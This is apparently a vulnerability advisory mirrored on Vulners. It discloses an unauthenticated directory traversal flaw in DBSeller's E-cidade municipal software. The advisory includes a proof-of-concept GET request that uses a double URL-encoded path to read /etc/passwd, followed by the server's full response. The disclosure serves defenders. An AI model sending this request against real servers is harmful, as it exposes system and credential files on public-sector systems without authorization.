Lucene search
K

E-Cidade Directory Traversal

🗓️ 22 Feb 2016 00:00:00Reported by vesp3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

E-Cidade Directory Traversal vulnerability in DBSeller's E-cidade Softwar

Code
`Vendor: DBSeller (www.dbseller.com.br)  
Product: E-cidade - Software Publico de Gestão Municipal  
Published: 02/19/2016  
Discovered by vesp3r ([email protected])  
  
  
  
Product Description  
--------------------  
  
Intended to computerize the management of Brazilian Municipalities.   
This includes computerized integration between municipal entities: City Hall, Town Hall, Local Government, Foundations and others.  
The economy of resources is only one of the advantages in the adoption of e-cidade and the freedom of choice of suppliers and ensuring   
continuity of the system, once supported by the Ministry of Planning.  
  
Advisory Timeline  
-----------------  
  
02/18/2016 - Vendor notified  
02/19/2016 - Vendor asked for more details  
02/19/2016 - Information and PoC sent  
02/20/2016 - Advisory was published  
  
Vulnerability  
-------------  
An unauthenticated user is able to access files and directories,   
the vulnerability can be exploited by issuing a specially crafted HTTP GET   
request utilizing a simple url encoding bypass(..%252f)  
  
Proof of Concept  
---------------  
  
GET /e-cidade/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1  
[Snip...]  
Accept-Encoding: gzip, deflate  
Connection: close  
  
  
  
  
Response:  
  
HTTP/1.1 200 OK  
Date: Fri, 19 Feb 2016 02:27:29 GMT  
Server: Apache/2.2.22 (Ubuntu)  
X-Powered-By: PHP/5.3.10-1ubuntu3.14  
Vary: Accept-Encoding  
Content-Length: 1351  
Connection: close  
Content-Type: text/plain; charset=ISO-8859-1  
X-Pad: avoid browser bug  
  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
man:x:6:12:man:/var/cache/man:/bin/sh  
lp:x:7:7:lp:/var/spool/lpd:/bin/sh  
mail:x:8:8:mail:/var/mail:/bin/sh  
news:x:9:9:news:/var/spool/news:/bin/sh  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:x:13:13:proxy:/bin:/bin/sh  
www-data:x:33:33:www-data:/var/www:/bin/sh  
backup:x:34:34:backup:/var/backups:/bin/sh  
list:x:38:38:Mailing List Manager:/var/list:/bin/sh  
irc:x:39:39:ircd:/var/run/ircd:/bin/sh  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh  
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh  
libuuid:x:100:101::/var/lib/libuuid:/bin/sh  
syslog:x:101:103::/home/syslog:/bin/false  
messagebus:x:102:105::/var/run/dbus:/bin/false  
whoopsie:x:103:108::/nonexistent:/bin/false  
landscape:x:104:110::/var/lib/landscape:/bin/false  
postgres:x:105:113:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash  
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin  
ecidade:x:1001:1001:eCidade,,,:/home/ecidade:/bin/bash  
dbseller:x:1000:1000:DBSeller,,,:/home/dbseller:/bin/bash  
postfix:x:107:116::/var/spool/postfix:/bin/false  
  
  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Feb 2016 00:00Current
0.3Low risk
Vulners AI Score0.3
29